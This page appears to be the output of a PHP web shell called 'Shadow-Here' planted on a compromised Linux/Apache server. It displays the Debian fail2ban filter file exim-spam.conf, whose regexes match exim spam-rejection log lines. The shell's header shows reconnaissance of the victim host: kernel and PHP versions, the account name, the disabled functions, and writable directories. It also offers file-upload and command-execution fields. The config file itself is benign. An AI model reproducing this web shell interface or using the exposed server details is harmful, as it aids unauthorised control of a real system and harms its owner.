Shadow-Here
Server : Apache
System : Linux methusalix2 3.16.0-11-amd64 #1 SMP Debian 3.16.84-1 (2020-06-09) x86_64
User : hios ( 1437)
PHP Version : 5.6.40-0+deb8u12
Disable Function : proc_close,proc_open,dl,shell_exec,passthru
Directory :  /etc/fail2ban/filter.d/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :
Current File : //etc/fail2ban/filter.d/exim-spam.conf
# Fail2Ban filter for exim the spam rejection messages
#
## For the SA: Action: silently tossed message... to be logged exim's SAdevnull option needs to be used.

[INCLUDES]

# Read common prefixes. If any customizations available -- read them from
# exim-common.local
before = exim-common.conf

[Definition]

failregex =  ^%(pid)s \S+ F=(<>|\S+@\S+) %(host_info)srejected by local_scan\(\): .{0,256}$
             ^%(pid)s %(host_info)sF=(<>|[^@]+@\S+) rejected RCPT [^@]+@\S+: .*dnsbl.*\s*$
             ^%(pid)s \S+ %(host_info)sF=(<>|[^@]+@\S+) rejected after DATA: This message contains a virus \(\S+\)\.\s*$
             ^%(pid)s \S+ SA: Action: silently tossed message: score=\d+\.\d+ required=\d+\.\d+ trigger=\d+\.\d+ \(scanned in \d+/\d+ secs \| Message-Id: \S+\)\. From \S+ \(host=(\S+ )?\[<HOST>\]\) for \S+$

ignoreregex = 

# DEV Notes:
# The %(host_info) defination contains a <HOST> match
#
# Author: Cyril Jaquier
#         Daniel Black (rewrote with strong regexs)

Samx